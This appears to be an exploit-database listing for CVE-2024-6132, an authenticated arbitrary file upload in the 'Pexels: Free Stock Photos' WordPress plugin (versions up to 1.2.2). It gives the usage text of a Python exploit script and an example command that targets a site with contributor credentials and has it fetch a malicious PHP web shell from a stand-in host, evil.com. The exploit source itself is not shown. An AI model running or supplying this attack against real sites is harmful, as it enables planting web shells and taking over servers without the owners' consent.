Share
## https://sploitus.com/exploit?id=DAA1B055-C63E-52C5-BC0A-EFDED5EE816E
# CVE-2024-6132
Pexels: Free Stock Photos <= 1.2.2 - Authenticated (Contributor+) Arbitrary File Upload



## Usage 

```
usage: CVE-2024-6132.py [-h] -u URL -un USERNAME -p PASSWORD -shell_url SHELL_URL

Pexels: Free Stock Photos <= 1.2.2 - Authenticated (Contributor+) Arbitrary File Upload | BY NXPLOIT - KHALED ALENAZI,

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     WordPress site URL
  -un USERNAME, --username USERNAME
                        WordPress username
  -p PASSWORD, --password PASSWORD
                        WordPress password
  -shell_url SHELL_URL, --shell_url SHELL_URL
                        URL of the malicious PHP file
```
## Example:

```
python3 CVE-2024-6132.py -u https://targetsite.com -un contributor -p password123 -shell_url http://evil.com/shell.php